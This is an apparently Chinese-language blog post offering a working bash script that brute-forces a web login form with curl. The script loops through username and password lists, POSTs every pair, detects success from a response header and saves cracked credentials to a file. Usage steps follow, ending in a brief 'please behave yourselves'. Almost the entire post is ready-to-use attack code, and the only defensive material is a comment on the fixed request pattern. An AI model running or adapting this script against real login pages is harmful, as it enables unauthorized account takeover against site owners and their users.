使用CURL进行蛮力密码破解
先上脚本
#!/usr/bin/env bash
# Submits every username in user.txt with every password in password.txt to a
# login form via curl, and treats a response whose headers contain the string
# 'https://localhost/loginsuccess' as a successful login.
# Inputs:  user.txt and password.txt in the current directory, one entry per line.
# Outputs: each response's headers on stdout; matched pairs appended to hit.txt.
# Side effects: ./temp is overwritten on every request and never removed;
#               hit.txt holds the matched credentials in plain text.
# Observable pattern (defender view): every request carries the same fixed
# User-Agent, Referer and Host headers and arrives at a constant cadence
# (2 s between attempts, 10 s between usernames), which server-side logging
# and rate limiting would see as one uniform request stream.
USERCOUNT=$(wc -l user.txt | cut -d' ' -f1)      # line count of user.txt ("N file" -> first field)
PWDCOUNT=$(wc -l password.txt | cut -d' ' -f1)   # line count of password.txt
# Outer loop: one pass per username; $i is the 1-based line number in user.txt.
for ((i=1; i<=$USERCOUNT; i++)); do
  USERNAME=`sed -n $i'p' user.txt`               # read line i of user.txt
  PASSWORD=$USERNAME                             # first attempt: password equal to the username
  echo "[$i][-]username=$USERNAME, password=$PASSWORD"
  echo ""
  # POST the pair as a form body; -D dumps the response headers into ./temp.
  curl 'https://localhost/loginurl' -H 'Connection: keep-alive' -H 'Host: localhost' -H 'Referer: https://localhost/index.jsp' -H 'User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0' -H 'Content-Type: application/x-www-form-urlencoded' --data "username=$USERNAME&password=$PASSWORD" -D ./temp
  cat ./temp                                     # show the headers so the result can be checked by eye
  FOUND=`grep 'https://localhost/loginsuccess' ./temp`   # matching header line, or empty if absent
  if [ "$FOUND" != "" ]; then                    # non-empty: the success marker was present
    echo 'FOUND!'
    # Record the pair in hit.txt (plain text, appended).
cat >> hit.txt <<EOS
username=$USERNAME, password=$PASSWORD
EOS
    continue                                     # username==password worked; skip the list for this user
  fi
  echo 'sleep 2 seconds.'
  echo ''
  sleep 2
  # Inner loop: walk password.txt for this username; $j is the 1-based line number.
  for ((j=1; j<=$PWDCOUNT; j++)); do
    PASSWORD=`sed -n $j'p' password.txt`         # read line j of password.txt
    echo "[$i][$j]username=$USERNAME, password=$PASSWORD"
    echo ""
    # Same request as above, with the candidate password from the list.
    curl 'https://localhost/loginurl' -H 'Connection: keep-alive' -H 'Host: localhost' -H 'Referer: https://localhost/index.jsp' -H 'User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0' -H 'Content-Type: application/x-www-form-urlencoded' --data "username=$USERNAME&password=$PASSWORD" -D ./temp
    cat ./temp
    FOUND=`grep 'https://localhost/loginsuccess' ./temp`
    if [ "$FOUND" != "" ]; then
      echo 'FOUND!'
      # Record the pair in hit.txt (plain text, appended).
cat >> hit.txt <<EOS
username=$USERNAME, password=$PASSWORD
EOS
      break                                      # stop at the first working password for this user
    fi
    echo 'sleep 2 seconds.'
    echo ''
    sleep 2                                      # fixed pause between attempts
  done
  echo 'sleep 10 seconds.'
  echo ''
  sleep 10                                       # longer fixed pause before the next username
done
将用户名列表保存为unix风格的user.txt
将密码列表保存为unix风格的password.txt
调整时间间隔
在curl返回的ResponseHeader里查找登录成功的标记(*关键)
开跑吧
本来是直接将ResponseHeader输出到/dev/stdout后再搜索的
FOUND=`curl blabla -D /dev/stdout | grep 'https://localhost/loginsuccess'`
但不能直接看到ResponseHeader还是不太踏实Orz
大家请自重
春日戀歌好棒,好喜歡…thk’s